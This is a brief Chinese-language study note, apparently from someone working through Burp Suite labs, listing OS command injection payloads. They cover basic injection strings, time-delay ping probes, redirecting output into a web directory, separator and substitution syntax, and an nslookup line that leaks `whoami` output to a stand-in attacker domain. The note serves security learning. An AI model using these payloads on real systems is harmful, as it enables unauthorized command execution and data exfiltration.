记录在做 burp lab 时学会的知识点。

# Executing arbitrary commands

最基础的 payload

1
2
3

& echo aiwefwlguh &
1|whoami

2. 常用指令
1
2
3
4
5
6
7

应用 Linux Windows
用户名 whoami whoami
操作系统 uname -a ver
网络设置 ifconfig ipconfig /all
网络连接 netstat -an netstat -an
进程 ps -ef tasklist

# Detecting blind OS command injection using time delays

1
2
& ping -c 10 127.0.0.1 &
|ping+-c+10+127.0.0.1||

# Exploiting blind OS command injection by redirecting output

配合目录穿越使用

1
2

& whoami > /var/www/static/whoami.txt &

# Exploiting blind OS command injection using out-of-band (OAST) techniques

1
2
3

& nslookup kgji2ohoyw.web-attacker.com &
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &

# Ways of injecting OS commands

  1. 仅 Unix 系统下使用的分隔符:
    1
    2
    3

    ;
    Newline (0x0a or \n)

    还可以通过以下方式执行命令:
    1
    2
    `injected command`
    $(injected command )